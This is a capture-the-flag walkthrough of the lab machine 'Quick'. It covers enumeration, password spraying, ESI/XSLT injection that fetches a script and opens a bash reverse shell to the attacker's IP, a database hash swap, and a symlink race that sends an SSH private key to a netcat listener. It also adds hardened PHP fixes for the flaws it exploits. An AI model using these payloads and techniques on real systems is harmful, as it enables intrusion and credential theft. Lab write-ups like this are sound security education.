# Quick

<figure><img src="/files/SdIELNhMYGjwNRVwt0i0" alt=""><figcaption></figcaption></figure>

## Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.

The following nmap command quickly scans the target machine for open ports and saves the output to a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.186 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** timing template, the fastest of nmap's timing templates.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allPorts* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Tue Apr  4 11:08:07 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.186
Nmap scan report for 10.10.10.186
Host is up (0.036s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
9001/tcp open  tor-orport

# Nmap done at Tue Apr  4 11:08:22 2023 -- 1 IP address (1 host up) scanned in 14.71 seconds
```

{% endcode %}

Now that we know which ports are open, let's try to identify the services and versions running on them. The following command scans these ports in more depth and saves the result into a file:

> nmap -sC -sV -p22,9001 10.10.10.186 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Tue Apr  4 11:08:43 2023 as: nmap -sCV -p22,9001 -Pn -n -oN targeted 10.10.10.186
Nmap scan report for 10.10.10.186
Host is up (0.036s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fbb0618239504b21a862984c9c388270 (RSA)
|   256 eebb4b72631710ee08ffe58671fe8f80 (ECDSA)
|_  256 80a6c27341f0354e5f61a76a50eab82e (ED25519)
9001/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Quick | Broadband Services
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr  4 11:08:58 2023 -- 1 IP address (1 host up) scanned in 14.64 seconds
```

{% endcode %}

There seems to be a website running on port 9001. Let's take a look at it.

<figure><img src="/files/fKFAgM0k6FSFDBkrnuOw" alt=""><figcaption></figcaption></figure>

## Exploitation

The update message has a link to `https://portal.quick.htb/`, but TCP port 443 is closed on the machine. Maybe we can reach it another way: HTTP/3 runs over QUIC (UDP), which our TCP-only scan would not have shown, so let's try it. First, we'll need to install [quiche](https://github.com/curl/curl/blob/master/docs/HTTP3.md#quiche-version).

> git clone --recursive <https://github.com/cloudflare/quiche>
>
> cd quiche
>
> cargo build --package quiche --release --features ffi,pkg-config-meta,qlog
>
> mkdir quiche/deps/boringssl/src/lib
>
> ln -vnf $(find target/release -name libcrypto.a -o -name libssl.a) quiche/deps/boringssl/src/lib/

Then, build curl.

> cd ..
>
> git clone <https://github.com/curl/curl>
>
> cd curl
>
> autoreconf -fi
>
> ./configure LDFLAGS="-Wl,-rpath,$PWD/../quiche/target/release" --with-openssl=$PWD/../quiche/quiche/deps/boringssl/src --with-quiche=$PWD/../quiche/target/release
>
> make
>
> make install

Now, we should have a version of *curl* that supports *HTTP/3*. Before trying to access `https://portal.quick.htb/`, we need to add the domain name to the `/etc/hosts` file.

> nano /etc/hosts

```
# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.186    quick.htb    portal.quick.htb
```

Finally, check the HTTPS website with the *curl* we just built.

> src/curl --http3 "<https://portal.quick.htb/>" -s -k

```html
<html>
<title> Quick | Customer Portal</title>
<h1>Quick | Portal</h1>
<head>
<style>
ul {
  list-style-type: none;
  margin: 0;
  padding: 0;
  width: 200px;
  background-color: #f1f1f1;
}

li a {
  display: block;
  color: #000;
  padding: 8px 16px;
  text-decoration: none;
}

/* Change the link color on hover */
li a:hover {
  background-color: #555;
  color: white;
}
</style>
</head>
<body>
<p> Welcome to Quick User Portal</p>
<ul>
  <li><a href="index.php">Home</a></li>
  <li><a href="index.php?view=contact">Contact</a></li>
  <li><a href="index.php?view=about">About</a></li>
  <li><a href="index.php?view=docs">References</a></li>
</ul>
</html>
```

The `References` page, accessible from `index.php?view=docs`, shows a few interesting files.

> src/curl --http3 "<https://portal.quick.htb/index.php?view=docs>" -s -k

```html
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">

<h1>Quick | References</h1>
<ul>
  <li><a href="docs/QuickStart.pdf">Quick-Start Guide</a></li>
  <li><a href="docs/Connectivity.pdf">Connectivity Guide</a></li>
</ul>
</head>
</html>
```

Let's download and open the `Connectivity.pdf` file. In the `How to Connect?` section we'll find a password.

> src/curl --http3 "<https://portal.quick.htb/docs/Connectivity.pdf>" -k -o Connectivity.pdf
>
> open Connectivity.pdf

<figure><img src="/files/ZAK8xWGCJW2W5qUd3ttQ" alt=""><figcaption></figcaption></figure>

Now we need to find out where to authenticate, and with which user. Back on the main website, there is a `Get Started` button that leads to the `login.php` login page.

<figure><img src="/files/TiVGj5F9MlmXvB8yweIS" alt=""><figcaption></figcaption></figure>

Also, at the bottom of the main page, there is a list of testimonials from several people.

<figure><img src="/files/gGsZpk8oAh6mAIBK1Rq4" alt=""><figcaption></figcaption></figure>

And the `clients` link goes to a list of companies with their respective countries. As the login page asks for an email, we can build a wordlist such as the following by combining the first name of each person who wrote a testimonial with their company's domain name, using the ccTLD of the company's country.

> nano users

```
tim@qconsulting.uk
tim@qconsulting.co.uk
roy@darkwing.us
elisa@wink.uk
elisa@wink.co.uk
james@lazycoop.cn
```

As we now have a list of emails, let's spray the password we found across all of them and see if it is valid for any.

> wfuzz -c -w users -d "email=FUZZ\&password=Quick4cc3$$" <http://10.10.10.186:9001/login.php>

{% code overflow="wrap" %}

```
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.186:9001/login.php
Total requests: 9

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                
=====================================================================

000000006:   200        0 L      2 W        80 Ch       "roy@darkwing.us"                                                                      
000000003:   200        0 L      2 W        80 Ch       "john@quick.htb"                                                                       
000000002:   200        0 L      2 W        80 Ch       "mike@quick.htb"                                                                       
000000008:   302        0 L      0 W        0 Ch        "elisa@wink.co.uk"                                                                     
000000007:   200        0 L      2 W        80 Ch       "elisa@wink.uk"                                                                        
000000004:   200        0 L      2 W        80 Ch       "tim@qconsulting.uk"                                                                   
000000005:   200        0 L      2 W        80 Ch       "tim@qconsulting.co.uk"                                                                
000000001:   200        0 L      2 W        80 Ch       "jane@quick.htb"                                                                       
000000009:   200        0 L      2 W        80 Ch       "james@lazycoop.cn"                                                                    

Total time: 0.102413
Processed Requests: 9
Filtered Requests: 0
Requests/sec.: 87.87931
```

{% endcode %}

The `elisa@wink.co.uk` email shows a different status code. Let's try to log in with that email and password.

<figure><img src="/files/FAPPWy2XvMYDeeADVEtW" alt=""><figcaption></figcaption></figure>

We got in. The search bar of this ticketing system does not seem to work, but from `Raise Ticket` we can create a ticket.

<figure><img src="/files/O6oL4xk28qf6ZZ0WMsPT" alt=""><figcaption></figcaption></figure>

If we submit the ticket, a popup message will appear with a ticket identifier.

<figure><img src="/files/BANCaFh9jBAyIaXbpkxz" alt=""><figcaption></figcaption></figure>

We need to find a way to search for tickets. Let's enumerate the website using *gobuster*.

> gobuster dir -u <http://10.10.10.186:9001> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -x php

* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of concurrent **threads**, in this case 200 threads.

{% code overflow="wrap" %}

```
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.186:9001
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/04/04 18:01:48 Starting gobuster in directory enumeration mode
===============================================================
/search.php           (Status: 200) [Size: 1]
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 3353]
/home.php             (Status: 200) [Size: 86]
/login.php            (Status: 200) [Size: 4345]
/clients.php          (Status: 200) [Size: 2698]
/db.php               (Status: 200) [Size: 0]
/ticket.php           (Status: 200) [Size: 86]
/.php                 (Status: 403) [Size: 279]
Progress: 175328 / 175330 (100.00%)
===============================================================
2023/04/04 18:04:50 Finished
===============================================================
```

{% endcode %}

There is a file called `search.php`, which asks for a search term.

<figure><img src="/files/Sjj3jQOC7DfdpFI8JKsA" alt=""><figcaption></figcaption></figure>

If we add the search GET parameter with the ticket identifier as its value, we'll see the ticket we created before.

> <http://10.10.10.186:9001/search.php?search=TKT-5072>

<figure><img src="/files/5y9SktxBiMtG8yCCtcgk" alt=""><figcaption></figcaption></figure>

Let's see if there is a way to inject code in this ticketing system. If we take a look at the HTTP response headers, we'll see one called `X-Powered-By` that has the value `Esigate`.

> curl <http://10.10.10.186:9001> -I

```
HTTP/1.1 200 OK
Server: Apache/2.4.29 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Via: 1.1 localhost (Apache-HttpClient/4.5.2 (cache))
X-Powered-By: Esigate
Content-Length: 2
```

If we search the internet for common *Esigate* exploits, we'll find an article called [ESI Injection Part 2: Abusing specific implementations](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/), which explains how to get *Remote Command Execution* on the server. First, we need to create a file called `rce` containing a reverse shell command back to our local machine.

> nano rce

```bash
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
```

Now, we need to create two files, `rce.xml` and `rce.xsl`, with the following code, which will download the `rce` file.

> nano rce.xml
>
> cp rce.xml rce.xsl

```xml
<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[wget http://10.10.14.5/rce]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>
```

Then, start a simple HTTP server with PHP on port 80 in the directory where all these files are located.

> php -S 0.0.0.0:80

And a *netcat* listener on port *4444*.

> nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

Next, create a new ticket with the following message.

{% code overflow="wrap" %}

```xml
<esi:include src="http://10.10.14.5/rce.xml" stylesheet="http://10.10.14.5/rce.xml"> </esi:include>
```

{% endcode %}

<figure><img src="/files/JWtCoMygTH07itgeNpaO" alt=""><figcaption></figcaption></figure>

Copy the ticket identifier.

<figure><img src="/files/W8BIoVhw3G07ykdus5cN" alt=""><figcaption></figcaption></figure>

Now, if we search for the ticket, the server will download the `rce` file from our HTTP server.

> <http://10.10.10.186:9001/search.php?search=TKT-2324>

```
[Tue Apr  4 18:25:23 2023] 10.10.10.186:49454 [200]: GET /rce
```

Now we need to trigger the `rce` bash script and catch the reverse shell. We just need to change the command in both the `rce.xml` and `rce.xsl` files.

> nano rce.xml
>
> cp rce.xml rce.xsl

```xml
...
<xsl:variable name="cmd"><![CDATA[bash rce]]></xsl:variable>
...
```

Finally, if we reload the `search.php` page, the server will run the `rce` script, and we'll catch a reverse shell as `sam`. Then, we'll be able to grab the user flag.

> <http://10.10.10.186:9001/search.php?search=TKT-2324>

```
Listening on 0.0.0.0 4444
Connection received on 10.10.10.186 44264
bash: cannot set terminal process group (1110): Inappropriate ioctl for device
bash: no job control in this shell
sam@quick:~$ whoami
whoami
sam
sam@quick:~$ cat user.txt
cat user.txt
34e254646f1732834991f7261317899c
```

## Privilege Escalation

First, let's set an interactive *TTY* shell.

> script /dev/null -c /bin/bash

Then we press `Ctrl+Z` and run the following commands on our local machine:

> stty raw -echo; fg
>
> reset
>
> Terminal type? xterm

Next, we export a few variables:

> export TERM=xterm
>
> export SHELL=bash

Finally, we run the following command on our local machine:

> stty size

```
51 236
```

And set the proper dimensions in the victim machine:

> stty rows 51 columns 236

As seen below, there are other directories apart from the `html` directory in `/var/www/`.

> ls -la /var/www

```
total 20
drwxr-xr-x  5 root root 4096 Dec 14  2021 .
drwxr-xr-x 14 root root 4096 Dec 14  2021 ..
drwxr-xr-x  2 root root 4096 Dec 14  2021 html
drwxrwxrwx  2 root root 4096 Apr  4 14:53 jobs
drwxr-xr-x  6 root root 4096 Dec 14  2021 printer
```

In fact, if we check the Apache `/etc/apache2/sites-enabled/000-default.conf` file, we'll see a second virtual host for the domain `printerv2.quick.htb`, served from `/var/www/printer` and running as the `srvadm` user (`AssignUserId srvadm srvadm`).

> cat /etc/apache2/sites-enabled/000-default.conf

```apacheconf
<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>
<VirtualHost *:80>
        AssignUserId srvadm srvadm
        ServerName printerv2.quick.htb
        DocumentRoot /var/www/printer
</VirtualHost>
```

Let's add the domain name to our `/etc/hosts` file.

> nano /etc/hosts

```
# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.186    quick.htb    portal.quick.htb    printerv2.quick.htb
```

If we access the website, we find another login page.

<figure><img src="/files/QB96ZktAIfgwSJe9fFJB" alt=""><figcaption></figcaption></figure>

As we have access to all the source code of the website, let's inspect it. The `/var/www/printer/db.php` file contains credentials for the MySQL database.

> cat /var/www/printer/db.php

```php
<?php
$conn = new mysqli("localhost","db_adm","db_p4ss","quick");
?>
```

Let's connect to the database using those credentials and enumerate the database.

> mysql -u db\_adm -pdb\_p4ss

There is one database called `quick`.

> mysql> show databases;

```
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| quick              |
| sys                |
+--------------------+
5 rows in set (0.00 sec)
```

The quick database has three tables.

> mysql> use quick;
>
> mysql> show tables;

```
+-----------------+
| Tables_in_quick |
+-----------------+
| jobs            |
| tickets         |
| users           |
+-----------------+
3 rows in set (0.01 sec)
```

The most interesting one is the `users` table, which has only two entries, containing the password hashes of the users `Elisa` and `Server Admin`.

> mysql> select \* from users;

```
+--------------+------------------+----------------------------------+
| name         | email            | password                         |
+--------------+------------------+----------------------------------+
| Elisa        | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+
2 rows in set (0.00 sec)
```

In fact, we can see how the passwords are hashed in the `index.php` file: `crypt()` with the fixed salt `fa`, and then MD5 over the result. Since the salt is the same for every user, identical passwords produce identical hashes.

> cat /var/www/printer/index.php

```php
...
$password = md5(crypt($password,'fa'));
...
```

As we won't be able to break the hash, we can simply replace the hash of the `srvadm@quick.htb` user with `Elisa`'s, whose password we already know.
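The following added example (not code from the machine or from the original post) shows why the hash swap works and what the corrected scheme looks like: the fixed `fa` salt makes the stored value deterministic, while `password_hash()` salts per user. The sample passwords are constructed.

```php
<?php
// Added example, not from the machine's index.php: it shows why copying Elisa's
// hash onto srvadm's row works, and the per-user-salted replacement. Only PHP
// built-ins are used; the sample passwords below are constructed, not the box's.
declare(strict_types=1);

// The scheme found on the box: crypt() with the fixed two-character salt 'fa'
// (a two-character salt selects traditional DES crypt, which only looks at the
// first 8 characters of the password), then MD5 over the result. Nothing in it
// varies per user, so equal passwords always produce equal hashes.
function legacyHash(string $password): string
{
    return md5(crypt($password, 'fa'));
}

// Replacement: password_hash() draws a random salt on every call and stores it
// inside the returned string, so two users with the same password get different
// hashes, and a hash moved to another row proves nothing about that user.
function modernHash(string $password): string
{
    return password_hash($password, PASSWORD_DEFAULT);
}

function modernVerify(string $password, string $stored): bool
{
    return password_verify($password, $stored);
}

// Constructed demonstration values: two users who chose the same password.
$pwElisa = 'Example-Passw0rd!';
$pwAdmin = 'Example-Passw0rd!';

printf("legacy, same password, same hash:        %s\n",
    var_export(legacyHash($pwElisa) === legacyHash($pwAdmin), true));
printf("legacy ignores characters past the 8th:  %s\n",
    var_export(legacyHash('Example-Passw0rd!') === legacyHash('Example-' . 'XXXXXXXX'), true));
printf("modern, same password, different hash:   %s\n",
    var_export(modernHash($pwElisa) !== modernHash($pwAdmin), true));
printf("modern verify still succeeds:            %s\n",
    var_export(modernVerify($pwAdmin, modernHash($pwAdmin)), true));
```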

> mysql> update users set password="c6c35ae1f3cb19438e0199cfa72a9d9d" where email="srvadm@quick.htb";

This way, we can log in as `srvadm@quick.htb` using the `Quick4cc3$$` password.

<figure><img src="/files/ZUphcWBQ51yCDvyegSoY" alt=""><figcaption></figcaption></figure>

Once logged in, we'll see a print server website.

<figure><img src="/files/cKaK1YJSjSHEiL6JxWL6" alt=""><figcaption></figcaption></figure>

We can add a printer. As it asks for an IP address, we can enter our own, so that we can see what is going on with a *netcat* listener.

<figure><img src="/files/z3flQB935mpBXxWZe3Af" alt=""><figcaption></figcaption></figure>

Set a netcat listener on port 5555.

> nc -lvnp 5555

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

Our new printer should be available from `Printers`.

<figure><img src="/files/TWUQGu9VUYLoFPYMF87n" alt=""><figcaption></figcaption></figure>

By pressing the printer icon, we'll see a message saying that we should add a job.

<figure><img src="/files/GL8RuZKRG4YhjEZfU7v6" alt=""><figcaption></figcaption></figure>

From the `PRINT JOBS` section, we can create a new job, which will be received by the *netcat* listener when the `Print` button is pressed.

<figure><img src="/files/m6pFqC0qADZFR6Z32ktt" alt=""><figcaption></figcaption></figure>

```
Listening on 0.0.0.0 5555
Connection received on 10.10.10.186 39462
testingVA
```

Let's inspect the source code and see if there is a way to escalate privileges. The `/var/www/printer/job.php` file has the following PHP code.

> cat /var/www/printer/job.php

{% code overflow="wrap" %}

```php
if($_SESSION["loggedin"])
{
        if(isset($_POST["submit"]))
        {
                $title=$_POST["title"];
                $file = date("Y-m-d_H:i:s");
                file_put_contents("/var/www/jobs/".$file,$_POST["desc"]);
                chmod("/var/www/printer/jobs/".$file,"0777");
                $stmt=$conn->prepare("select ip,port from jobs");
                $stmt->execute();
                $result=$stmt->get_result();
                if($result->num_rows > 0)
                {
                        $row=$result->fetch_assoc();
                        $ip=$row["ip"];
                        $port=$row["port"];
                        try
                        {
                                $connector = new NetworkPrintConnector($ip,$port);
                                sleep(0.5); //Buffer for socket check
                                $printer = new Printer($connector);
                                $printer -> text(file_get_contents("/var/www/jobs/".$file));
                                $printer -> cut();
                                $printer -> close();
                                $message="Job assigned";
                                unlink("/var/www/jobs/".$file);
                        }
                        catch(Exception $error) 
                        {
                                $error="Can't connect to printer.";
                                unlink("/var/www/jobs/".$file);
                        }
                }
                else
                {
                        $error="Couldn't find printer.";
                }
        }

```

{% endcode %}

For each new job, the web server creates a new file in the `/var/www/jobs/` directory, named with the current date in the format `Y-m-d_H:i:s`, and writes the `Bill Details` of the job into it. Finally, it connects to the configured printer and sends the content of the file.

Before connecting, it waits for 0.5 seconds and then reads the file back by path. This is a problem because in that window we can replace the file created in `/var/www/jobs/` with a symbolic link to the private SSH key of the `srvadm` user: the directory is world-writable, and the printer virtual host runs as `srvadm`, so the key is readable by the process. When the server then connects to our machine, we'll receive the `id_rsa` private key.
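As an added example, not the machine's `job.php`, here is how the same spool-and-print step can be written so that the race no longer exists. It assumes the escpos-php `Printer` and `NetworkPrintConnector` classes the original uses, a placeholder private spool directory, and the `posix` extension.

```php
<?php
// Added example, not the machine's job.php: a hardened spool-and-print routine
// that closes the symlink race described above. Assumptions (not from the page):
// $conn is the application's mysqli handle, NetworkPrintConnector and Printer are
// the escpos-php classes the original uses, SPOOL_DIR is a placeholder directory
// owned by the web user with mode 0700 (the real fix for the world-writable
// /var/www/jobs), and the posix extension provides posix_geteuid().
declare(strict_types=1);

use Mike42\Escpos\Printer;
use Mike42\Escpos\PrintConnectors\NetworkPrintConnector;

const SPOOL_DIR = '/var/spool/printer-jobs'; // placeholder, not a path from the page

function spoolAndPrint(mysqli $conn, string $desc): string
{
    // 1. Random name instead of the clock-derived Y-m-d_H:i:s, and 'x+' (O_EXCL):
    //    fopen fails if anything, a symlink included, already sits at that path,
    //    so a pre-planted link can never be written to or read through.
    $path = SPOOL_DIR . '/job_' . bin2hex(random_bytes(16));
    $oldUmask = umask(0077);              // file is created 0600; no chmod 0777
    $fh = fopen($path, 'x+');
    umask($oldUmask);
    if ($fh === false) {
        throw new RuntimeException('cannot create spool file');
    }

    try {
        // 2. Defence in depth: what we hold must be a regular file we own.
        $st = fstat($fh);
        if (($st['mode'] & 0170000) !== 0100000 || $st['uid'] !== posix_geteuid()) {
            throw new RuntimeException('spool file is not a private regular file');
        }

        // 3. Write and read back through the same descriptor. The original wrote
        //    by path, slept, then called file_get_contents() on the path again;
        //    a descriptor is bound to the inode, so relinking the path in between
        //    no longer changes what is read.
        fwrite($fh, $desc);
        rewind($fh);
        $payload = stream_get_contents($fh);

        $stmt = $conn->prepare('SELECT ip, port FROM jobs LIMIT 1');
        $stmt->execute();
        $row = $stmt->get_result()->fetch_assoc();
        if ($row === null) {
            return "Couldn't find printer.";
        }

        $printer = new Printer(new NetworkPrintConnector($row['ip'], (int) $row['port']));
        $printer->text($payload);
        $printer->cut();
        $printer->close();
        return 'Job assigned';
    } catch (RuntimeException $e) {
        throw $e;                          // tampering is an error, not a printer fault
    } catch (Exception $e) {
        return "Can't connect to printer.";
    } finally {
        fclose($fh);
        @unlink($path);
    }
}
```

The simplest fix is to skip the spool file entirely, since `$_POST["desc"]` is already in memory; the version above keeps the file only to mirror the original flow and show the safe pattern.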

Go to `/var/www/printer` and run the following command.

> cd /var/www/printer
>
> while true; do date=$(date +%F\_%H:%M:%S); if \[ -r $date ]; then ln -s -f /home/srvadm/.ssh/id\_rsa $date; fi ; done

Now, go ahead and create a new job. When we hit `Print`, we should see the private SSH key of the `srvadm` user in our netcat listener.

<figure><img src="/files/swkdfQvtTyImfjdfKSSR" alt=""><figcaption></figcaption></figure>

```
Connection received on 10.10.10.186 39472
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAutSlpZLFoQfbaRT7O8rP8LsjE84QJPeWQJji6MF0S/RGCd4P
AP1UWD26CAaDy4J7B2f5M/o5XEYIZeR+KKSh+mD//FOy+O3sqIX37anFqqvhJQ6D
...
+DvKZu+NeroPtaI7NZv6muiaK7ZZgGcp4zEHRwxM+xQvxJpd3YzaKWZbCIPDDT/u
NJx1AkN7Gr9v4WjccrSk1hitPE1w6cmBNStwaQWD+KUUEeWYUAx20RA=
-----END RSA PRIVATE KEY-----
VA
```

Copy and paste the key into the `id_rsa` file, give it the right permissions, and get a shell as `srvadm`.

> nano id\_rsa; chmod 600 id\_rsa
>
> ssh -i id\_rsa srvadm\@10.10.10.186

{% code overflow="wrap" %}

```
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Apr  4 19:10:20 UTC 2023

  System load:  1.13              Users logged in:                0
  Usage of /:   73.1% of 7.75GB   IP address for ens33:           10.10.10.186
  Memory usage: 16%               IP address for docker0:         172.17.0.1
  Swap usage:   0%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Processes:    186


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

52 packages can be updated.
27 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Apr  4 18:42:58 2023 from 10.10.14.5
srvadm@quick:~$ whoami
srvadm
```

{% endcode %}

If we check the `srvadm` home directory, we'll see the `.cache` folder.

> ls -la

{% code overflow="wrap" %}

```
total 40                                                                                                                                  
drwxr-xr-x 6 srvadm srvadm 4096 Apr  4 18:44 .                                                                                            
drwxr-xr-x 4 root   root   4096 Mar 20  2020 ..                                                                                           
lrwxrwxrwx 1 srvadm srvadm    9 Mar 20  2020 .bash_history -> /dev/null                                                                   
-rw-r--r-- 1 srvadm srvadm  220 Mar 20  2020 .bash_logout                                                                                 
-rw-r--r-- 1 srvadm srvadm 3771 Mar 20  2020 .bashrc                                                                                      
drwx------ 5 srvadm srvadm 4096 Mar 20  2020 .cache                                                                                       
drwx------ 3 srvadm srvadm 4096 Mar 20  2020 .gnupg                                                                                       
drwxrwxr-x 3 srvadm srvadm 4096 Mar 20  2020 .local                                                                                       
-rw------- 1 srvadm srvadm   62 Apr  4 18:44 .mysql_history                                                                               
-rw-r--r-- 1 srvadm srvadm  807 Mar 20  2020 .profile                                                                                     
drwx------ 2 srvadm srvadm 4096 Mar 20  2020 .ssh
```

{% endcode %}

It contains a few more directories.

> ls -la .cache/

{% code overflow="wrap" %}

```
total 20                                                                                                                                  
drwx------ 5 srvadm srvadm 4096 Mar 20  2020 .                                                                                            
drwxr-xr-x 6 srvadm srvadm 4096 Apr  4 18:44 ..                                                                                           
drwxr-xr-x 2 srvadm srvadm 4096 Mar 20  2020 conf.d                                                                                       
drwxr-xr-x 2 srvadm srvadm 4096 Mar 20  2020 logs                                                                                         
-rw-r--r-- 1 srvadm srvadm    0 Mar 20  2020 motd.legal-displayed                                                                         
drwxr-xr-x 2 srvadm srvadm 4096 Mar 20  2020 packages
```

{% endcode %}

Inside the `conf.d` directory there is a file called `printers.conf` with some credentials in it.

> cat .cache/conf.d/printers.conf

```
DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer
```

Let's URL-decode the URI.

> php --interactive

{% code overflow="wrap" %}

```
Interactive shell

php > echo urldecode("DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer");
DeviceURI https://srvadm@quick.htb:&ftQ4K3SGde8?@printerv3.quick.htb/printer
```

{% endcode %}

The decoded password, `&ftQ4K3SGde8?`, turns out to be valid for the root user as well. So finally, all we have to do is reap the harvest and take the root flag.

> su root

```
Password: 
root@quick:/home/srvadm# whoami
root
root@quick:/home/srvadm# cat /root/root.txt 
53b4aa89af24e5b268b63aa398042f78
```

